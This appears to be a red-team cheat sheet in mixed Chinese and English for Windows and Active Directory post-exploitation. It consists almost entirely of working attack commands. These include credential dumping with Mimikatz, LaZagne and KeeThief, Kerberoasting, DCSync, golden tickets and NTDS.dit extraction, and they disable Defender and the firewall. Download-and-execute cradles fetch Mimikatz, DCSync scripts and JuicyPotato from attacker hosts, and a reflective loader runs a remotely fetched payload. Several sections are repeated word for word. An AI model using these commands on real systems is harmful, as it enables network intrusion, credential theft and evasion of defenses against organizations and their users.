reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

检查AlwaysInstalledElevated Reg Key

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

注册表中有密码吗？

reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s 

遗留的任何Sysrep或无人参与文件

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

GPP（组策略首选项）密码

smbclient //DOMAINCONTROLLER.local/SYSVOL -U m0chan

\m0chanAD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\Preferences\Groups\

http://www.sec-1.com/blog/wp-content/uploads/2015/05/gp3finder_v4.0.zip - For Decryption

Can also use PowerUP.ps1

转储Chrome密码（也称为漏洞利用后）

# git clone https://github.com/rasta-mouse/CookieMonster

CookieMonster creds
CookieMonster.exe cookies -d [domain] -e 
CookieMonster -a 

必须在目标用户的上下文中运行，因为chrome密码是用DPAPI加密的。

Can also use Mimikatz for this.

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data"

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect

转储 KeePass

# https://github.com/HarmJ0y/KeeThief
# http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/

Get-Process keepass
tasklist | findstr keepass

Attacking KeePass

# https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.

Token 令牌模拟攻击

# https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

还可以使用meterpreter的隐姓埋名窃取访问/委派令牌并模拟用户。（需要管理员/SYSTEM Privs）

# Tokenvator https://github.com/0xbadjuju/Tokenvator

反射式加载Powershell、Cobalt、SilentTrinity等。。。

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)


反射负载。NET程序集，如果你不能通过你的C2基础设施做到这一点

烂土豆漏洞提权

# Requires SeImpersonatePrivilege (Typically found on service accounts IIS Service, SQL Service etc)

# Reference https://ohpe.it/juicy-potato/

要求：SeAssignPrimaryTokenPrivilege和/或SeImpersonatePrivilege

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/JuicyPotato.exe','C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Backup\JuicyPotato.exe')

JuicyPotato.exe -l 1337 -p C:\Users\Public\Documents\Mochan.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}

Mochan.exe = Payload
5B3E6773-3A99-4A3D-8096-7765DD11785C = Target CLISD

CLSID是标识COM类对象的GUID

也可以使用-A标志在cmd.exe/powershell.exe等旁边指定参数

多汁的土豆必须从CMD SHELL而不是POWERSHELL运行

Kerberoasting 攻击

# 深入查看我的博客文章Kerberos攻击以了解更多信息
# https://m0chan.github.io/Kerberos-Attacks-In-Depth

Get-DomainSPNTicket -Credential $cred -OutputFormat hashcat

because Hashcat over John anyday right?

Invoke-Kerberoast.ps1

python GetUserSPNs.py -request -dc-ip 10.10.14.15 m0chanad.local/serviceaccount

Ofc上述要求访问DC上的端口88，但如果手动执行GetUserSPNs.py，则始终可以进行端口转发。

https://github.com/GhostPack/SharpRoast --NOW Deprecated-- and incorproated into Rebeus with the kerberoast action

Kerberoast with Python

#https://github.com/skelsec/kerberoast


重要提示：接受的格式如下
<ldap_connection_string> : <domainname>/<username>/<secret_type>:<secret>@<DC_ip>
<kerberos_connection_string>: <kerberos realm>/<username>/<secret_type>:<secret>@<DC_ip>



通过LDAP查找易受攻击的用户：
kerberoast ldap all <ldap_connection_string> -o ldapenum

对ldapanom_ASREP_users.txt文件中的用户使用ASREP烧录：
kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt

对ldapanom_SPN_users.txt文件中的用户使用SPN烧录：
kerberoast spnroast <kerberos_connection_string> -t ldapenum_spn_users.txt

AS Rep Roasting 攻击

# 帐户必须明确设置DONT_REQ_PREAUTH，使其易受攻击

Get-ASRepHash -Domain m0chanAD.local -User victim

也可以使用Rebeus（反射加载.NET程序集。）

.\Rubeus.exe asreproast

DCSync 漏洞攻击

# 运行DCSync需要特殊权限。管理员、域管理员或企业管理员的任何成员以及域控制器计算机帐户都可以运行DCSync来提取密码数据。请注意，默认情况下，只读域控制器不允许提取用户的密码数据。

# 以及将“复制更改”权限设置为“允许”的任何人（即“全部复制更改/复制目录更改”）

mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator

powershell.exe -Version 2 -Exec Bypass /c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:8000/Invoke-DCSync.ps1'); Invoke-DCSync -PWDumpFormat"


Empire Module: powershell/credentials/mimikatz/dcsync_hashdump

使用Windows终端从管理员帐户升级到系统外壳

# https://twitter.com/spotheplanet/status/1318487486826504197/photo/1

PsExec.exe -i -s "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal.X.X\WindowsTerminal.exe"

五、Windows 后利用技能

后渗透常用命令

net user m0chan /add /domain
net localgroup Administrators m0chan /add

# 启用RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

关闭防火墙
netsh firewall set opmode disable

Or like this
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you get this error:

CredSSP Error Fix ->

Add this reg key:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

Esenutl.exe转储锁定的文件

C:\WINDOWS\system32\esentutl.exe /y <SOURCE> /vss /d <DEST>


如果您想转储SAM和（或）SYSTEM，但文件被操作系统锁定（Windows 10），这可能很有用

检查Powershell日志记录是否已启用

reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription

Seatbelt 安全枚举工具

# https://github.com/GhostPack/Seatbelt

这真是太好了，它可以枚举你所需要的一切，也是一个。NET程序集，因此可以反射加载以避免AV:D双赢

BasicOSInfo           -   Basic OS info (i.e. architecture, OS version, etc.)
RebootSchedule        -   Reboot schedule (last 15 days) based on event IDs 12 and 13
TokenGroupPrivs       -   Current process/token privileges (e.g. SeDebugPrivilege/etc.)
UACSystemPolicies     -   UAC system policies via the registry
PowerShellSettings    -   PowerShell versions and security settings
AuditSettings         -   Audit settings via the registry
WEFSettings           -   Windows Event Forwarding (WEF) settings via the registry
LSASettings           -   LSA settings (including auth packages)
UserEnvVariables      -   Current user environment variables
SystemEnvVariables    -   Current system environment variables
UserFolders           -   Folders in C:\Users\
NonstandardServices   -   Services with file info company names that don't contain 'Microsoft'
InternetSettings      -   Internet settings including proxy configs
LapsSettings          -   LAPS settings, if installed
LocalGroupMembers     -   Members of local admins, RDP, and DCOM
MappedDrives          -   Mapped drives
RDPSessions           -   Current incoming RDP sessions
WMIMappedDrives       -   Mapped drives via WMI
NetworkShares         -   Network shares
FirewallRules         -   Deny firewall rules, "full" dumps all
AntiVirusWMI          -   Registered antivirus (via WMI)
InterestingProcesses  -   "Interesting" processes- defensive products and admin tools
RegistryAutoRuns      -   Registry autoruns
RegistryAutoLogon     -   Registry autologon information
DNSCache              -   DNS cache entries (via WMI)
ARPTable              -   Lists the current ARP table and adapter information (equivalent to arp -a)
AllTcpConnections     -   Lists current TCP connections and associated processes
AllUdpConnections     -   Lists current UDP connections and associated processes
NonstandardProcesses  -   Running processeswith file info company names that don't contain 'Microsoft'
  *  If the user is in high integrity, the following additional actions are run:
SysmonConfig          -   Sysmon configuration from the registry

And more!!

转储凭据

(new-object System.Net.WebClient).DownloadString('http://10.10.14.5:8000/Invoke-Mimikatz.ps1');Invoke-Mimikatz 

也可以在一些AV Evasion删除字符串等之后运行Mimikatz.exe。ippSec有一个很好的教程。

mimikatz.exe
privlege::debug
sekurlsa::logonPasswords full

更安全的方法是使用MiniDump转储LSASS.exe的进程内存
(https://github.com/3xpl01tc0d3r/Minidump)

(or) https://github.com/GhostPack/SharpDump

并将.bin发送到Mimikatz本地。

sekurlsa::minidump C:\users\m0chan\lssas.dmp

也可以用于转储和通过票证攻击，但将在其他地方进行覆盖。

Mimikatz Guide

#Logon Sessions

sekurlsa::logonPasswords all

#Dump Cache

lsadump::cache

#Dump SAM

lsadump::sam

转储凭据 2

# https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

使用WinRM远程转储SAM

Invoke-Command -ComputerName m0chan -Credential $cred -ScriptBlock {reg save hklm\sam c:\temp\sam.save}

Invoke-Command -ComputerName m0chan -Credential $cred -ScriptBlock {reg save hklm\system c:\temp\system.save}

Invoke-Command -ComputerName m0chan -Credential $cred -ScriptBlock {reg save hklm\security c:\temp\security.save}

使用GadgetToJScript或VBS运行Mimikatz

# https://gist.github.com/med0x2e/cc10d42b1f581507013e801da2651c74

cscript mimi.js privilege::debug < safe.txt

SessionGopher 工具

# https://github.com/Arvanaghi/SessionGopher

悄悄地为PuTTY、WinSCP、FileZilla、SuperPuTTY和RDP挖掘保存的会话信息

SessionGopher是一个PowerShell工具，用于查找和解密远程访问工具保存的会话信息。它内置了WMI功能，因此可以远程运行。它的最佳用例是识别可能连接到Unix系统、跳转框或销售点终端的系统

Invoke-SessionGopher -Thorough

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

转储Chrome密码（也称为漏洞利用后）

# git clone https://github.com/rasta-mouse/CookieMonster

CookieMonster creds
CookieMonster.exe cookies -d [domain] -e 
CookieMonster -a 

必须在目标用户的上下文中运行，因为chrome密码是用DPAPI加密的。

Can also use Mimikatz for this.

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data"

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect

mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect

转储进程内存w/Mimikittenz

# https://github.com/putterpanda/mimikittenz

mimikittenz是一种利用后的powershell工具，它利用Windows函数ReadProcessMemory（）从各种目标进程中提取纯文本密码。

mimikitenz的目标是提供用户级（非管理员特权）敏感数据提取，以最大限度地提高利用后的努力，并增加每个目标收集的信息的价值。

Invoke-Mimikittenz

转储KeePass

# https://github.com/HarmJ0y/KeeThief
# http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/

Get-Process keepass
tasklist | findstr keepass

Attacking KeePass

# https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.

pypykatz 工具

# https://github.com/skelsec/pypykatz

Full python implementation of Mimikatz :D 

pip3 install pypykatz

SafetyKatz 工具

# https://github.com/GhostPack/SafetyKatz

可以反射加载的Mimikatz的完整C Sharp Implementation：D

“SafetyKatz是@gentilkiwis Mimikatz项目和@subte的.NET PE Loader的略微修改版本的组合。

首先，MiniDumpWriteDump Win32 API调用用于创建LSASS到C:\Windows\Temp\debug.bin的小型转储。然后@subtes PELoader用于加载Mimikatz的自定义版本，该版本在小型转储文件上运行sekulsa:：logonpasswords和sekulsa：：ekeys，在执行完成后删除该文件。"

SharpDPAPI 工具

# https://github.com/GhostPack/SharpDPAPI

Mimikatzs DPAPI功能的完整C Sharp实现，允许访问DPAPI功能。

SharpSniper 工具

# https://github.com/HunnicCyber/SharpSniper

通常，红队的参与不仅仅是实现域管理。一些客户端会想看看域中的特定用户是否会受到威胁，例如CEO。

SharpSnipper是一个简单的工具，可以找到这些用户的IP地址，这样你就可以瞄准他们的盒子。

C:\> SharpSniper.exe emusk DomainAdminUser DAPass123

User: emusk - IP Address: 192.168.37.130

SharpLocker 工具

# https://github.com/Pickfordmatt/SharpLocker

SharpLocker通过弹出一个假的Windows锁定屏幕来帮助获取当前用户凭据，所有输出都会发送到控制台，该控制台非常适合Cobalt Strike。

检查是否缺少的KB补丁清单

watson.exe
Sherlock.ps1

使用Watson.exe程序集并进行反射加载。NET汇编到内存中以避免防病毒。

更多在底部重新。反射加载的东西。（更改某些字符串等也没有坏处）

https://github.com/rasta-mouse/Watson

使用Mimikatz解密EFS文件（如果是Admin/System）

# https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files

cipher /c "d:\Users\Gentil Kiwi\Documents\m0chan.txt" - View if File is EFS Encrypted and whom can Decrypt, sometimes Impersonating a token is easier than manually decrying with mimikatz.

privilege::debug 
token::elevate 
crypto::system /file:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B53C6DE283C00203587A03DD3D0BF66E16969A55" /export

dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-494464150-3436831043-1864828003-1001\79e1ac78150e8bea8ad238e14d63145b_4f8e7ec6-a506-4d31-9d5a-1e4cbed4997b"

dpapi::masterkey /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Protect\S-1-5-21-494464150-3436831043-1864828003-1001\1eccdbd2-4771-4360-8b19-9d6060a061dc" /password:waza1234/

dpapi::capi /in:"D:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-494464150-3436831043-1864828003-1001\79e1ac78150e8bea8ad238e14d63145b_4f8e7ec6-a506-4d31-9d5a-1e4cbed4997b" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

openssl x509 -inform DER -outform PEM -in B53C6DE283C00203587A03DD3D0BF66E16969A55.der -out public.pem

openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -out private.pem

openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot

UAC Bypass

https://egre55.github.io/system-properties-uac-bypass/ - Read Ghoul writeup on HTB for more Info 

findstr /C:"<autoElevate>true" 

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
C:\Windows\SysWOW64\SystemPropertiesComputerName.exe
C:\Windows\SysWOW64\SystemPropertiesHardware.exe
C:\Windows\SysWOW64\SystemPropertiesProtection.exe
C:\Windows\SysWOW64\SystemPropertiesRemote.exe

黄金票据攻击

# Check my Blog Post Kerberos Attacks in Depth for Further Information
#https://m0chan.github.io/Kerberos-Attacks-In-Depth

# 使用NTLM生成TGT
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# 使用AES 128密钥生成TGT
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# 使用AES 256密钥生成TGT（更安全的加密，可能更隐蔽，因为Microsoft默认使用）
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# 用Mimikatz注射TGT
mimikatz # kerberos::ptt <ticket_kirbi_file>


# 用Rebeus注射票证
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

.\PsExec.exe -accepteula \\<remote_hostname> cmd

DCSync 和 金票合一

# https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1


此脚本将滥用DCSync权限提取krbtgt密码，并在最终将其导入当前会话之前自动生成一个黄金票证。

然后，您可以将自己添加到Domain Admins/Enterprise Admins组中以获得持久性。

.\MakeMeEnterpriseAdmin.ps1

子域到林的妥协

Domain = Logical group of objects (users, computers, servers etc etc) supported from a central location like a DC

Tree = Set of domains using same name space (DNS Name)

Trust = Agreement between 2 domains that allow cross-domain access to resources etc. i/e Michelle@dev.m0chan.com may be able to access resources inside HR.m0chan.com.

Forest = Largest Structure composed of all trees.

Most trees are linked with dual sided trust relationships to allow for sharing of resources.

By default the first domain created if the Forest Root.

Lets say we have owned a domain controller and got the KRBTGT Hash (The keys to the castle) we can now create 

Covert-NameToSid target.domain.com\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502

Replace 502 with 519 to represent Enterprise Admins

Create golden ticket and attack parent domain. 


This will not work if there is SID Filtering in place for respective target domain.

harmj0ys article explains it best. 

#http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/

转储 NTDS.dit

C:\vssadmin create shadow /for=C:
copy \\?
\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\ntds\ntds.dit
.
copy \\?
\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SYSTEM
.
copy \\?
\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SAM
.
reg SAVE HKLM\SYSTEM c:\SYS
vssadmin delete shadows /for= [/oldest | /all | /shadow=]


If you pwn a BackupOperator account with SeBackupPrivilege you can also dump NTDS.dit

备份转储 NTDS.dit

Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

PS C:\m0chan> Get-SeBackupPrivilege
SeBackupPrivilege is disabled

PS C:\m0chan> Set-SeBackupPrivilege

PS C:\m0chan> Get-SeBackupPrivilege
SeBackupPrivilege is enabled

PS C:\m0chan> Copy-FileSeBackupPrivilege P:\Windows\System32\ntds.dit C:\m0chan\ntds.dit -Overwrite
Copied 12582912 bytes

Use diskshadow to mount a shadow copy and then copy Windows\system32\ntds.dit 

Remember and not use C:\Windows\ntds\ntds.dit

reg.exe save hklm\system c:\m0chan\SYSTEM.bak

SecretsDumper Windows

#https://github.com/maaaaz/impacket-examples-windows
secretsdumper.exe -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract